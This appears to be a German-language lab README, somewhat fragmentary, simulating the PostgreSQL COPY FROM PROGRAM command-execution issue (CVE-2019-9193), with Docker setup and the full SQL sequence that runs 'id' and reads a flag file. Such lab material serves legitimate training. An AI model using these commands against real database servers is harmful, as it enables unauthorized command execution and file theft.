
Dieses Labor simuliert CVE-2019-9193 - PostgreSQL COPY FROM PROGRAM RCE
Dieses Labor simuliert CVE-2019-9193, eine Schwachstelle in PostgreSQL 9.3–11.2, die folgendes ermöglicht:
COPY ... FROM PROGRAM '<Befehl>'
zur Ausführung von OS-Befehlen durch einen Superuser oder eine Rolle mit pg_execute_server_program.
Ihre Aufgabe ist es, diese Funktion auszunutzen, um folgende Datei zu lesen:
/tmp/flag.txt
COPY FROM PROGRAM, um:
docker compose build
docker compose up -d
Verbinden Sie sich via:
psql -U postgres -h 127.0.0.1 -p 5433
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
TRUNCATE cmd_exec;
COPY cmd_exec FROM PROGRAM 'cat /tmp/flag.txt';
SELECT * FROM cmd_exec;
pg_execute_server_program nicht unnötig